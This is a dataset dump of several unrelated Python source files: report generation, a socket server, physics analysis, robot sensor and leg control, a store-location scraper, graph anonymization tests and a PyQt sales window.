b_address_worksheet.merge_range(start_pos,1,stop_pos,1,len(email_series_for_b_addr[i]),number_of_mails_format)\n #reset\n col = 0\n #printProgressBar(i+1,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n\n b_address_worksheet.set_column('A1:B1',30)\n b_address_worksheet.set_column('C1:C1',180)\n b_address_worksheet.set_row(0,40)\n\n b_address_worksheet.write('A1','Địa chỉ nhận',from_format)\n b_address_worksheet.write('B1','Số lượng thư',number_of_mails_format)\n b_address_worksheet.write('C1','Vị trí lưu trữ trên máy',location_format)\n\n\n workbook.close()\n\n print(r\"---------------------------------------------------------------\")\n print(r\" _____ ____ __ __ _____ _ ______ _______ ______ _____\")\n print(r\"/ ____// __ \\| \\/ | __ \\| | | ____|__ __| ____| __\\\\\")\n print(r\"| | | | | | \\ / | |__) | | | |__ | | | |__ | | | |\")\n print(r\"| | | | | | |\\/| | ___/| | | __| | | | __| | | | |\")\n print(r\"| |___| |__| | | | | | | |____| |____ | | | |____| |__| |\")\n print(r\" \\_____\\____/|_| |_|_| |______|______| |_| |______|_____/ \")\n print(r\"---------------------------------------------------------------\") \n \n \n print(\"\\n\\nHoàn thành! Nhấn phím bất kỳ để thoát...\\n\\n\")\n input()\nexcept Exception as e:\n logging.error('[ERROR] ' + str(e))\n logging.traceback.print_stack()","sub_path":"get_excel_report.py","file_name":"get_excel_report.py","file_ext":"py","file_size_in_byte":8936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"313975073","text":"import socket\nimport threading\n\nsock = socket.socket()\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nport = 8888\nsock.bind(('0.0.0.0', port))\nsock.listen()\n\nthreadId = 0\n\nclass ReadThread(threading.Thread):\n def __init__(self, threadName, conn):\n threading.Thread.__init__(self)\n\n self.threadName = threadName\n self.msg = b''\n self.conn = conn\n\n def run(self):\n print('{} starting'.format(self.threadName))\n\n # Blocks and waits for either all or 1024 bytes of data to be received.\n recv_data = self.conn.recv(1024)\n\n # Keep reading the connection until there is no more.\n while recv_data:\n print('{} partial msg received: {}'.format(self.threadName, recv_data)) \n self.msg += recv_data\n recv_data = self.conn.recv(1024)\n\n print('{} full msg received: {}'.format(self.threadName, self.msg))\n\n # Close the connection.\n self.conn.close()\n\nwhile True:\n # Blocks and waits for a connection.\n print('Main thread: starting up and waiting for input connection on {}'.format(port))\n conn, addr = sock.accept()\n\n threadId += 1\n threadName = 'Thread {}'.format(threadId)\n ReadThread(threadName, conn).start()\n\n","sub_path":"examples/sync_blocking_scale.py","file_name":"sync_blocking_scale.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"69713171","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom array import array\nimport argparse\nimport sys\nimport ROOT\nimport json\nimport re\nfrom DataFormats.FWLite import Events, Handle\nfrom Analysis.HLTAnalyserPy.EvtData import EvtData, EvtHandles,phaseII_products, add_product,get_objs\n\nimport Analysis.HLTAnalyserPy.CoreTools as CoreTools\nimport Analysis.HLTAnalyserPy.GenTools as GenTools\nimport Analysis.HLTAnalyserPy.HistTools as HistTools\n\ndef match_tkeg_index(egidx,trkegs):\n for trkeg in trkegs:\n if trkeg.EGRef().key()==egidx:\n return trkeg\n return None\n\n\ndef print_l1_region(evtdata,suffix):\n l1egs = evtdata.get(\"l1egs{}\".format(suffix))\n l1tkphos = evtdata.get(\"l1tkphos{}\".format(suffix))\n l1tkeles = evtdata.get(\"l1tkeles{}\".format(suffix))\n \n for egidx,eg in enumerate(l1egs):\n tkpho = match_tkeg_index(egidx,l1tkphos)\n tkele = match_tkeg_index(egidx,l1tkeles)\n print_str = \" {indx} {et} {eta} {phi}\".format(indx=egidx,et=eg.et(),\n eta=eg.eta(),phi=eg.phi())\n if tkpho:\n print_str+=\" tkpho {et} {isol} {isolPV}\".format(et = tkpho.et(),\n isol = tkpho.trkIsol(),\n isolPV = tkpho.trkIsolPV())\n if tkele:\n print_str+=\" tkele {et} {isol} {isolPV} {zvtx}\".format(\n et = tkele.et(),isol = tkele.trkIsol(),isolPV = tkele.trkIsolPV(),\n zvtx = tkele.trkzVtx())\n print(print_str)\n\n \ndef print_l1(evtdata,events,index):\n events.to(index)\n evtdata.get_handles(events)\n print(\"barrel:\")\n print_l1_region(evtdata,\"_eb\")\n print(\"encap:\")\n print_l1_region(evtdata,\"_hgcal\")\n\nif __name__ == \"__main__\":\n \n CoreTools.load_fwlitelibs()\n\n parser = argparse.ArgumentParser(description='example e/gamma HLT analyser')\n parser.add_argument('in_filename',nargs=\"+\",help='input filename')\n parser.add_argument('--prefix','-p',default='file:',help='file prefix')\n parser.add_argument('--out','-o',default=\"output.root\",help='output filename')\n args = parser.parse_args()\n add_product(phaseII_products,\"countEcalRecHitsEBThres0GeV\",\"int\",\"hltEgammaHLTExtra:countEcalRecHitsEcalRecHitsEBThres0GeV\")\n add_product(phaseII_products,\"countEcalRecHitsEBThres1GeV\",\"int\",\"hltEgammaHLTExtra:countEcalRecHitsEcalRecHitsEBThres1GeV\")\n add_product(phaseII_products,\"ecalHitsTest\",\"edm::SortedCollection >\",\"hltEcalRecHit:EcalRecHitsEB\")\n add_product(phaseII_products,\"hgcalTest\",\"edm::SortedCollection >\",\"HGCalRecHit:HGCHEBRecHits\")\n add_product(phaseII_products,\"countHGCal1GeV\",\"int\",\"hltEgammaHLTPhase2Extra:countHgcalRecHitsHGCHEBRecHitsThres1GeV\")\n add_product(phaseII_products,\"countHGCal0GeV\",\"int\",\"hltEgammaHLTPhase2Extra:countHgcalRecHitsHGCHEBRecHitsThres0GeV\")\n add_product(phaseII_products,\"trig_sum\",\"trigger::TriggerEvent\",\"hltTriggerSummaryAOD::HLTX\")\n \n evtdata = EvtData(phaseII_products,verbose=True)\n \n in_filenames_with_prefix = ['{}{}'.format(args.prefix,x) for x in args.in_filename]\n events = Events(in_filenames_with_prefix)\n \n print(\"number of events\",events.size())\n\n \n# with open(\"weights_test_qcd.json\") as f:\n# import json\n# weights = json.load(f)\n\n# weighter = QCDWeightCalc(weights[\"v2\"][\"qcd\"])\n# events.to(3)\n# evtdata.get_handles(events)\n# weighter.weight(evtdata)\n","sub_path":"HLTAnalyserPy/test/readPhaseII.py","file_name":"readPhaseII.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"167620315","text":"import wpilib\nimport hal\nfrom hal_impl import i2c_helpers, data\nimport typing\n\nhal_data = data.hal_data\n\nclass ColorSensorBase(wpilib.SendableBase):\n\n def __init__(self):\n super().__init__()\n self.redChannel = 0\n self.blueChannel = 0\n self.greenChannel = 0\n\n def getColor(self, *args, **kwargs) -> int:\n\n raise NotImplementedError(\n \"Implement 'getColor' in your class!\"\n )\n\n def getRed(self, *args, **kwargs) -> int:\n\n raise NotImplementedError(\n \"Implement 'getRed' in your class!\"\n )\n\n def getBlue(self, *args, **kwargs) -> int:\n\n raise NotImplementedError(\n \"Implement 'getBlue' in your class!\"\n )\n\n def getGreen(self, *args, **kwargs) -> int:\n\n raise NotImplementedError(\n \"Implement 'getGreen' in your class!\"\n )\n\n def initSendable(self, builder: wpilib.SendableBuilder) -> None:\n builder.setSmartDashboardType(\"ColorSensor\")\n builder.addDoubleProperty(\"Red\", self.getRed, None)\n builder.addDoubleProperty(\"Blue\", self.getBlue, None)\n builder.addDoubleProperty(\"Green\", self.getGreen, None)\n\nclass REV_Color_Sim(i2c_helpers.I2CSimBase):\n\n def __init__(self, sensor):\n super().__init__()\n self.red = 0\n self.green = 0\n self.blue = 0\n self.clear = 0\n\n def initializeI2C(self, port, status):\n self.color_key = \"rev_color_sensor_v2_%d_color\" % port\n\n def transactionI2C(\n self, port, deviceAddress, dataToSend, sendSize, dataReceived, receiveSize\n ):\n deviceAddress = 0x39\n sendSize = 0xFF\n receiveSize = 0xFF\n dataReceived[0] = 0xFF\n port = wpilib.I2C.Port.kOnboard\n\n return 1\n\n def readI2C(self, port, deviceAddress, buffer, count):\n color = hal_data[\"robot\"].get(self.color_key, 0)\n if count is 2:\n buffer[1] = (0xFF).to_bytes(1, \"big\")\n buffer[0] = (0xFF).to_bytes(1, \"big\")\n elif count is 1:\n buffer[0] = (0xFF).to_bytes(1, \"big\")\n\n return count\n\nclass REV_Color_Sensor_V2(ColorSensorBase):\n\n ADDRESS = 0x39\n\n def __init__(self, port: wpilib.I2C.Port = 0):\n super().__init__()\n\n if port is None:\n port = wpilib.I2C.Port.kOnboard\n\n simPort = None\n if hal.HALIsSimulation():\n simPort = REV_Color_Sim(self)\n\n self.i2c = wpilib.I2C(port, self.ADDRESS, simPort=simPort)\n self.clearChannel = 0\n self.setName(\"REV_Robotics_Color_Sensor_V2\", port)\n\n def enable(self) -> None:\n self.i2c.write(0x00, 0x83)\n\n def getColor(self, addClear: bool = False) -> typing.List[int]:\n if addClear:\n self.clearChannel = self.readRawRegister(0x80 | 0x20 | 0x14)[0]\n self.redChannel = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x16), byteorder=\"big\")\n self.greenChannel = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x18), byteorder=\"big\")\n self.blueChannel = int.from_bytes(self.readRawRegister(0x80| 0x20| 0x1a), byteorder=\"big\")\n \n color = [None] * 3\n if addClear:\n color = [self.redChannel, self.greenChannel, self.blueChannel]\n color.append(self.clearChannel)\n else:\n color = [self.redChannel, self.greenChannel, self.blueChannel, self.clearChannel]\n return color\n\n def getRed(self):\n redRegLow = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x16, 2), byteorder=\"big\")\n # redRegHigh = int.from_bytes(self.readRawRegister(0x17, 1), byteorder=\"big\")\n return redRegLow\n\n def getGreen(self):\n greenRegLow = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x18, 2), byteorder=\"big\")\n # greenRegHigh = int.from_bytes(self.readRawRegister(0x19, 1), byteorder=\"big\")\n return greenRegLow\n\n def getBlue(self):\n blueRegLow = int.from_bytes(self.readRawRegister(0x80 | 0x20 | 0x1a, 2), byteorder=\"big\")\n # blueRegHigh = int.from_bytes(self.readRawRegister(0x1b, 1), byteorder=\"big\")\n return blueRegLow\n\n def readRegister(self, register: int, bytes: int) -> int:\n return int.from_bytes(self.i2c.read(register, bytes), byteorder=\"big\")\n\n def readRawRegister(self, register: int, bytes: int) -> bytearray:\n return self.i2c.read(register, bytes)\n","sub_path":"sensors/rev_color_sensor.py","file_name":"rev_color_sensor.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"421250931","text":"# Quadruped robot leg class\n# Created in 2019 10/20\n# Vision = 1.0\n# Author Junwen Cui\n\nfrom controller import *\nfrom comm.action.basis import Speed,Pos,Torque,Force,IK,DK,vallimit,torque2force\nimport numpy as np\n\nclass Leg():\n\n def __init__(self, module_name, module_info):\n\n self.module_info = module_info\n\n self.speed = Speed() #Current speed\n self.speed_f = Speed() #Desire speed\n \n self.position = Pos() #Current position\n self.position_f = Pos() #Desire position\n\n self.torque_f = Torque() #Desire torque\n \n self.force = Force()\n self.force_f = Force() #Desire foot force\n\n self.swing_angle = 0\n self.thign_angle = 0\n self.calf_angle = 0\n\n self.swing_angle_f = 0 #Desire motor position\n self.thign_angle_f = 0\n self.calf_angle_f = 0\n\n self.touchstate = 0\n\n self.swing_motor = Motor(module_name['swing_motor_s'])\n self.thign_motor = Motor(module_name['thignleg_motor_s'])\n self.calf_motor = Motor(module_name['calfleg_motor_s'])\n\n self.swing_motor.enableTorqueFeedback(2)\n self.thign_motor.enableTorqueFeedback(2)\n self.calf_motor.enableTorqueFeedback(2)\n\n self.swing_positionsensor = PositionSensor(module_name['swing_positionsensor_s'])\n self.thign_positionsensor = PositionSensor(module_name['thign_positionsensor_s'])\n self.calf_positionsensor = PositionSensor(module_name['calf_positionsensor_s'])\n self.swing_positionsensor.enable(2)\n self.thign_positionsensor.enable(2)\n self.calf_positionsensor.enable(2)\n\n self.touchsensor = TouchSensor(module_name['foot_touchsensor_s'])\n self.touchsensor.enable(2)\n\n def refresh(self, type_ = 'all'): \n '''\n Refresh the position of the motor and calculate the position of the end of the foot, \n and collect the pressure of the end of the foot\n '''\n\n if(type_ == 'all'):\n\n self.swing_angle = self.swing_positionsensor.getValue()\n self.thign_angle = self.thign_positionsensor.getValue()\n self.calf_angle = self.calf_positionsensor.getValue()\n\n DK(self, self.module_info) #refresh leg xyz position \n\n #refresh foot force\n self.force = self.touchsensor.getValues()\n for i in range(3):\n self.force[i] /= 10\n\n #foot touch judge\n if( np.sqrt(np.square(self.force[0]) + np.square(self.force[1]) + np.square(self.force[2])) >= 8 ):\n self.touchstate = 1\n else:\n self.touchstate = 0\n\n def __set_torque(self, swing_torque, thign_torque, calf_torque): \n '''\n Set motor torque\n '''\n\n swing_torque = vallimit(swing_torque, -20, 20)\n thign_torque = vallimit(thign_torque, -20, 20)\n calf_torque = vallimit(calf_torque, -20, 20)\n\n self.swing_motor.setTorque(float(swing_torque))\n self.thign_motor.setTorque(float(thign_torque))\n self.calf_motor.setTorque(float(calf_torque))\n\n def __set_motorspeed(self, swing_speed, thign_speed, calf_speed): \n '''\n Set motor speed\n '''\n\n self.swing_motor.setVelocity(swing_speed)\n self.thign_motor.setVelocity(thign_speed)\n self.calf_motor.setVelocity(calf_speed)\n\n def __set_motorposition(self): \n '''\n Set motor position\n '''\n\n self.swing_motor.setPosition(self.swing_angle_f)\n self.thign_motor.setPosition(self.thign_angle_f)\n self.calf_motor.setPosition( self.calf_angle_f)\n\n\n def set_force(self, force): \n '''\n Set foot force vector\n '''\n\n self.force_f = force\n\n torque2force(self, self.module_info)\n\n self.__set_torque(self.torque_f.swing, self.torque_f.thign, self.torque_f.calf)\n\n return 0\n\n def set_velocity(self, speed): \n '''\n Set foot speed vector\n '''\n return 0\n\n def set_position(self, pos): \n '''\n Set foot position\n '''\n\n self.position_f = pos\n IK(self, self.module_info)\n\n self.__set_motorposition()\n\n return 0","sub_path":"controllers/dog_b/comm/base/leg.py","file_name":"leg.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"359737217","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#############################################################################\n#\n# Copyright (c) 2013 Baidu.com, Inc. All Rights Reserved\n#\n#############################################################################\n#\n#\n# @file server/send.py\n# @author Chen Weican(chenweican@baidu.com)\n# @date 2013/09/10 12:06:02\n# @brief\n#\n#############################################################################\nimport httplib\nimport urllib2\nimport urllib\nimport sys\nimport logging\nimport urlparse\n\ndef send_to_url(url, data, body_content, platform, version):\n logger = logging.getLogger()\n parse = urlparse.urlparse(url)\n host = parse.netloc\n url_pre = parse.path + \"?\" + parse.query\n header = dict()\n header['Accept-Encoding'] = 'gzip'\n header['S-COOKIE'] = data\n header['DODROID_PLATFORM'] = platform\n header['DODROID_VERSION'] = version\n header['DODROID_BIULDID'] = \"20130109\"\n header['Charset'] = \"UTF-8\"\n #header['Content-Length'] = body_content.count('')\n header['Content-Length'] = len(body_content)\n conn = httplib.HTTPConnection(host)\n #conn.request(method='POST', url='/DodroidServlet?cmd=updateaddr', body=params, headers=header)\n try:\n conn.request(method='POST', url=url_pre, body=body_content, headers=header)\n response = conn.getresponse()\n ret = response.read()\n if (200 == response.status):\n if ( ret.find('error') >= 0):\n return False\n return True\n else:\n return False\n except Exception as e:\n logger.exception(e)\n return False\n\n \n","sub_path":"server/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"43939340","text":"from hand_pose import Hand_Pose\nimport RPi.GPIO as GPIO\nimport ClientSocket\nfrom random import randint \nimport time\nfrom pyEMS.EMSCommand import ems_command\nfrom pyEMS import openEMSstim\nfrom threading import Thread\n\nmy_ems_board = openEMSstim.openEMSstim(\"/dev/ttyUSB0\",19200)\nintensity1 = 0\nintensity2 = 0\nmode = 1\n\n\"\"\"def cameraThreadFunc(handPose):\n print ('start camera')\n GPIO.output(3, GPIO.HIGH)\n handPose.startCamera()\"\"\"\n\ndef printNum2Str(preStr, number):\n if number == 1:\n print (preStr + 'rock')\n elif number == 2:\n print (preStr + 'scissor')\n elif number == 3:\n print (preStr + 'paper')\n else:\n pass\n\ndef socketThreadFunc(hand_pose):\n cc = ClientSocket.ClientSocket('172.20.10.3', 4001)\n cc.connect()\n\n try:\n while True:\n if cc.checkRecv():\n cmd = cc.recvCmd()\n params = cc.recvParam()\n print (\"cmd = %s\" % cmd)\n print (\"params = %s\" % params)\n \n if cmd == '1':\n intensity1 = int(params[0])\n intensity2 = int(params[1])\n mode = int(params[2])\n elif cmd == '2':\n if mode == 1:\n rand_number = randint(1, 3)\n printNum2Str('EMS: ', rand_number)\n EMS(rand_number, intensity1, intensity2)\n time.sleep(0.5)\n result = hand_pose.posPredict()\n printNum2Str('predict: ', result)\n if (rand_number == result):\n cc.send('3')\n elif ((rand_number - result == 1) or (rand_number - result == -2)):\n cc.send('1')\n else:\n cc.send('2')\n else:\n predictResult = hand_pose.posPredict()\n printNum2Str('predict 1: ', predictResult)\n winPose = predictResult - 1\n if winPose == 0:\n winPose = 3\n EMS(winPose, intensity1, intensity2)\n printNum2Str('winPose:', winPose)\n time.sleep(0.5)\n realResult = hand_pose.posPredict()\n printNum2Str('predict 2: ', realResult)\n if (winPose == realResult):\n cc.send('3')\n elif ((winPose - realResult == 1) or (winPose - realResult == -2)):\n cc.send('1')\n else:\n cc.send('2') \n elif cmd == '3':\n intensity1 = int(params[0])\n intensity2 = int(params[1])\n mode = int(params[2])\n EMS(mode, intensity1, intensity2)\n else:\n print (\"wrong cmd\")\n time.sleep(0.01)\n finally:\n GPIO.output(3, GPIO.LOW)\n\n \ndef EMS(number, intensity1, intensity2):\n if number == 2:\n # print (\"scissor\",)\n # print (intensity2)\n my_ems_board.send(ems_command(1,intensity2,1000))\n elif number == 1:\n # print (\"rock\",)\n # print (intensity1)\n my_ems_board.send(ems_command(1,intensity1,1000))\n time.sleep(0.01)\n my_ems_board.send(ems_command(2,intensity1,1000))\n else:\n pass \n\nif __name__ == '__main__':\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(3, GPIO.OUT)\n #GPIO.output(3, GPIO.LOW)\n GPIO.output(3, GPIO.HIGH)\n \n hand_pose = Hand_Pose()\n socketThread = Thread(target = socketThreadFunc, args = (hand_pose,))\n socketThread.start()\n hand_pose.startCamera()\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"401564065","text":"\"\"\"Build an np.array from some glove file and some vocab file\r\n\r\nYou need to download `glove.840B.300d.txt` from\r\nhttps://nlp.stanford.edu/projects/glove/ and you need to have built\r\nyour vocabulary first (Maybe using `build_vocab.py`)\r\n\"\"\"\r\n\r\n__author__ = \"Guillaume Genthial\"\r\n\r\nfrom pathlib import Path\r\n\r\nimport numpy as np\r\n\r\nroot_dir = \"/data/kongyy/nlp/tf_ner_guillaumegenthial/\"\r\n\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n if len(sys.argv) < 2:\r\n print(\"usage: python build_w2v.py opinion_id\")\r\n sys.exit(0)\r\n opinion_id = sys.argv[1]\r\n DATADIR = root_dir + 'example/{}/'.format(opinion_id)\r\n # Load vocab\r\n with Path(DATADIR + 'vocab.words.txt').open() as f:\r\n word_to_idx = {line.strip(): idx for idx, line in enumerate(f)}\r\n size_vocab = len(word_to_idx)\r\n emb_szie = 60\r\n level = \"char\"\r\n\r\n # Array of zeros\r\n embeddings = np.zeros((size_vocab, emb_szie))\r\n\r\n # Get relevant glove vectors\r\n found = 0\r\n print('Reading W2V file (may take a while)')\r\n with open('/data/kongyy/nlp/word_vectors/typical_opinion_{}_{}.txt'.format(level, emb_szie), \"r\", encoding=\"utf8\",\r\n errors=\"ignore\") as f:\r\n for line_idx, line in enumerate(f):\r\n if line_idx % 1000 == 0:\r\n print('- At line {}'.format(line_idx))\r\n line = line.strip().split()\r\n if len(line) != emb_szie + 1:\r\n continue\r\n word = line[0]\r\n embedding = line[1:]\r\n if word in word_to_idx:\r\n found += 1\r\n word_idx = word_to_idx[word]\r\n embeddings[word_idx] = embedding\r\n print('- done. Found {} vectors for {} words'.format(found, size_vocab))\r\n\r\n # Save np.array to file\r\n np.savez_compressed(DATADIR + 'w2v_{}.npz'.format(opinion_id), embeddings=embeddings)\r\n","sub_path":"data/example/build_w2v.py","file_name":"build_w2v.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"311070159","text":"import requests\nfrom bs4 import BeautifulSoup\nimport datetime\nimport json\nimport pandas as pd\nfrom pandas import ExcelWriter\nimport re\n\nmain_domian = 'http://pokupochka.ru/shop/all'\n\ngood_data = []\n\ndef get_all_shop():\n r = requests.get(main_domian)\n page = BeautifulSoup(r.text, 'html.parser')\n last_page = page.find('ul', class_='pagination pag_dop').find_all('li')[-1].find('a').get_text()\n last_page = int(last_page)\n for num_page in range(1, last_page+1):\n shops_on_page(f'http://pokupochka.ru/shop/all/page/{num_page}')\n\n\ndef shops_on_page(url):\n r = requests.get(url)\n page = BeautifulSoup(r.text, 'html.parser')\n for shop in page.find('div', class_='shop_list').find_all('div', class_=\"item\"):\n\n\n good_row = {}\n\n shop_url = 'http://pokupochka.ru' + shop.find('div', class_='row').find('a')['href']\n good_row['shop_url'] = shop_url\n\n address = shop.find('div', class_='row').find('div', class_='address').get_text()\n phone = shop.find('div', class_='row').find('div', class_='phone').get_text()\n workday = shop.find('div', class_='row').find('div', class_='col-sm-3 workday').get_text()\n\n good_row['address'] = address.encode('latin-1').decode(\"utf-8\")\n good_row['working_time'] = workday.encode('latin-1').decode(\"utf-8\")\n\n good_row['x'],good_row['y'] = get_coords_shop(shop_url)\n\n good_row['brand_name'] = 'Покупочка'\n good_row['country'] = 'Russian Federation'\n good_row['holding_name'] = 'Покупочка'\n good_row['date_review'] = datetime.datetime.now()\n\n good_row['website'] = 'http://pokupochka.ru'\n\n\n print(good_row)\n good_data.append(good_row)\n\n\n\ndef get_coords_shop(url):\n r = requests.get(url)\n page = BeautifulSoup(r.text, 'html.parser')\n y,x = page.find('div', id='map')['data-coord'].split(',')\n return x,y\n\n\n# Функция для записи в XLSX не вызываетя ( закомпилирована ) см. maria_pd_data\ndef write_xlsx(df, name_file):\n writer = ExcelWriter(f'{name_file}.xlsx')\n df.to_excel(writer, 'Sheet1')\n writer.save()\n return 'ФАЙЛ СОХРАНЕН'\n\ndef pokupochka_pd_data():\n\n '''\n Парсер используем BS4 и requests\n 1. выесяням сколько всего страниц с магазинами (ищем крайнию)\n last_page = page.find('ul', class_='pagination pag_dop').find_all('li')[-1].find('a').get_text()\n 2. фомируме url http://pokupochka.ru/shop/all/page/{num_page}\n 3. Перебираем все страницы с магазинами с забираем все строки с данными и ссылку на коннктретный магазин\n page.find('div', class_='shop_list').find_all('div', class_=\"item\")\n 4. По ссылке на конкретный магазин переходим и забираем координаты\n good_row['x'],good_row['y'] = get_coords_shop(shop_url)\n 5. Формируем good_row записываем в good_data\n 6. Из данных находяшихся в good_data формируем df\n\n\n :return:\n '''\n\n\n get_all_shop()\n df = pd.DataFrame(good_data)\n #write_xlsx(df,'pokupochka')\n return df\n\n\n\n","sub_path":"crawlers/shop/pokupochka.py","file_name":"pokupochka.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"552488271","text":"# coding=utf-8\nimport logging.config\nimport os\nimport pickle\nimport sys\nimport multiprocessing\nfrom collections import defaultdict\n\nfrom simple_settings import settings\n\nif __name__ == '__main__':\n pid = os.fork()\n if pid > 0:\n sys.exit(0)\n os.environ['SIMPLE_SETTINGS'] = 'settings.master'\n settings.setup()\n from algorithm.search.ga import GA\n from algorithm.search.greedy import Greedy\n\n logging.config.dictConfig(settings.LOGGING_CONFIG)\n\n logger = logging.getLogger('test')\n\n greedy_result = defaultdict(defaultdict)\n ga_result = defaultdict(defaultdict)\n\n result = {\n 'greedy': greedy_result,\n 'ga': ga_result\n }\n\n pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())\n processes = []\n for graph, sum_of_edge in settings.GRAPHS:\n for func, func_args in settings.FUNCS:\n greedy = Greedy(graph=graph, sum_of_edge=sum_of_edge, func=func, func_args=func_args)\n processes.append(\n (('greedy', graph, sum_of_edge, func.__name__, func_args), pool.apply_async(greedy.anonymize)))\n\n for edges_sum in range(1, sum_of_edge + 1, 1):\n ga = GA(graph=graph, population_size=400, chromosome_size=edges_sum, func=func, func_args=func_args,\n mate_probability=0.8, mutate_probability=0.02, disaster_interval=20, generation_num=200)\n processes.append((('ga', graph, edges_sum, func.__name__, func_args), pool.apply_async(ga.run)))\n\n pool.close()\n pool.join()\n\n for info, process in processes:\n key, graph, sum_of_edge, func_name, func_args = info\n try:\n result[key][graph][func_name] = process.get()\n except:\n continue\n\n with open('result.dict', 'wb') as f:\n pickle.dump(result, f)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"25881994","text":"from datetime import date\nfrom PyQt5 import QtWidgets, uic\nfrom PyQt5 import QtGui\nfrom Modelo.arregloProductos import *\nfrom Modelo.arregloClientes import *\nfrom Modelo.arregloDetalleVenta import *\nfrom Modelo.arregloFactura import *\nfrom Vista.ventanaClientes import *\nfrom Vista.ventanaProductos import *\n\naDetVent = ArregloDetalleVenta()\naFac = ArregloFactura() \n\nlista = []\n\nclass VentanaVentas(QtWidgets.QMainWindow):\n\n def __init__(self,parent = None):\n super(VentanaVentas,self).__init__(parent)\n self.setWindowIcon(QtGui.QIcon(\"UI/imagenes/venta.png\"))\n uic.loadUi(\"UI/ventanaVentas.ui\", self)\n\n self.btnBuscarCliente.clicked.connect(self.buscarCliente)\n self.btnBuscarProducto.clicked.connect(self.buscarProducto)\n self.btnAgregar.clicked.connect(self.agregar)\n self.btnGenerar.clicked.connect(self.generarVenta)\n self.btnImprimirFactura.clicked.connect(self.imprimirFactura)\n self.btnCerrar.clicked.connect(self.cerrarVentana)\n self.calcularFecha()\n self.generarNumeroDocumento()\n self.item = 0\n self.stock_actual_temporal = {}\n\n def buscarCliente(self):\n codigoCliente = self.txtCodigoCliente.text()\n if self.txtCodigoCliente.text() == \"\":\n QtWidgets.QMessageBox.information(self, \"Código Cliente\", \"Debe ingresar el código del cliente...!!!\", QtWidgets.QMessageBox.Ok)\n else:\n pos = aCli.buscarCliente(codigoCliente)\n objCliente = aCli.devolverCliente(pos)\n if pos == -1:\n QtWidgets.QMessageBox.information(self, \"Código Cliente\", \"Cliente no registrado...!!!\", QtWidgets.QMessageBox.Ok)\n else:\n self.txtNombres.setText(objCliente.getNombresCliente() + \" \" + objCliente.getApellidoPaternoCliente() + \" \" + objCliente.getApellidoMaternoCliente())\n \n def buscarProducto(self):\n codigoProducto = self.txtCodigoProducto.text()\n if self.txtCodigoProducto.text() == \"\":\n QtWidgets.QMessageBox.information(self, \"Código Producto\", \"Debe ingresar el código del producto...!!!\", QtWidgets.QMessageBox.Ok)\n else:\n pos = aPro.buscarProducto(codigoProducto)\n objProducto = aPro.devolverProducto(pos)\n if pos == -1:\n QtWidgets.QMessageBox.information(self, \"Código Producto\", \"Producto no registrado...!!!\", QtWidgets.QMessageBox.Ok)\n else:\n stock_temporal = self.obtenerStockActualTemporal(codigoProducto)\n if stock_temporal == -1: # ocurre cuando no existe el producto en el diccionario\n self.stock_actual_temporal[self.txtCodigoProducto.text()] = int(objProducto.getStockActual())\n stock_temporal = self.obtenerStockActualTemporal(codigoProducto) \n self.txtDescripcion.setText(objProducto.getDescripcion())\n self.txtStock.setText(str(stock_temporal))\n self.txtPrecio.setText(objProducto.getPrecioVenta())\n \n def obtenerStockActualTemporal(self, codigoProducto):\n stockEncontrado = -1 # variable auxiliar que contiene de manera predeterminada -1, indicando que no se encontró el stock\n if len(self.stock_actual_temporal) != 0: \n for llave in self.stock_actual_temporal:\n if llave == codigoProducto:\n stockEncontrado = self.stock_actual_temporal[llave]\n return stockEncontrado\n return stockEncontrado\n\n def actualizarStockActualTemporal(self, codigoProducto, cantidad):\n for llave in self.stock_actual_temporal:\n if llave == codigoProducto:\n self.stock_actual_temporal[llave]= self.stock_actual_temporal[llave] - cantidad\n\n def obtenerNumeroDocumento(self):\n return self.txtNumeroDocumento.text()\n \n def obtenerCodigo(self):\n return self.txtCodigoProducto.text()\n \n def obtenerDescripcion(self):\n return self.txtDescripcion.text()\n \n def obtenerPrecio(self):\n return float(self.txtPrecio.text())\n\n def obtenerCantidad(self):\n return int(self.txtCantidad.text()) \n \n def obtenerItem(self):\n self.item = self.item + 1\n return self.item\n \n def obtenerFecha(self):\n return self.txtFecha.text() \n\n def calcularFecha(self):\n self.fecha = date.today()\n dia = self.fecha.day\n mes = self.fecha.month\n año = self.fecha.year\n self.txtFecha.setText(str(dia) + \"/\" + str(mes) + \"/\" + str(año))\n\n def imprimirFactura(self):\n try:\n if self.txtNumeroDocumento.text() == \"\":\n QtWidgets.QMessageBox.information(self, \"Imprimir Factura\", \"No se ha realizado ninguna venta...!!!\", 